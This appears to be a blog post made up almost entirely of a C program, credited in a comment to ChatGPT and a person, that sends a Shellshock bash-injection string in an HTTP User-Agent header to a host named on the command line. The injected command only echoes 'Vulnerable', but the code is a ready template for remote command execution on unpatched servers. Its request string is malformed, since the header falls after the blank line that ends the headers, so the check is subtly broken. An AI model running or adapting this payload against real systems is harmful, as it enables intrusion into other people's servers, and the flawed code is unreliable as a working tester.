// write by Chat openAi and Adam
//clang -emit-llvm -o foo.bc -c shellsock.c -O3
//lli foo.bc exemple.com 80
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
char buffer[1024];
char *get = "GET / HTTP/1.1\r\n\r\nUser-Agent: () { :; }; /bin/bash -c 'echo Vulnerable'\r\n\r\n";
char *user_agent = "User-Agent: () { :; }; /bin/bash -c 'echo Vulnerable'";
if (argc < 2) {
fprintf(stderr,"Usage: %s hostname port\n", argv[0]);
exit(0);
}
portno = atoi(argv[2]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}
server = gethostbyname(argv[1]);
if (server == NULL) {
fprintf(stderr,"ERROR, no such host\n");
exit(0);
}
memset(&serv_addr, 0, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(portno);
memcpy(&serv_addr.sin_addr.s_addr, server->h_addr, server->h_length);
if (connect(sockfd,(struct sockaddr *) &serv_addr,sizeof(serv_addr)) < 0) {
perror("ERROR connecting");
exit(1);
}
bzero(buffer,1024);
//snprintf(buffer, sizeof(buffer), "GET / HTTP/1.1\r\n%s\r\n\r\n", user_agent);
n = write(sockfd, get, strlen(get));
if (n < 0) {
perror("ERROR writing to socket");
exit(1);
}
bzero(buffer,1024);
n = read(sockfd, buffer, 1023);
if (n < 0) {
perror("ERROR reading from socket");
exit(1);
}
printf("%s\n",buffer);
close(sockfd);
return 0;
}
No comments:
Post a Comment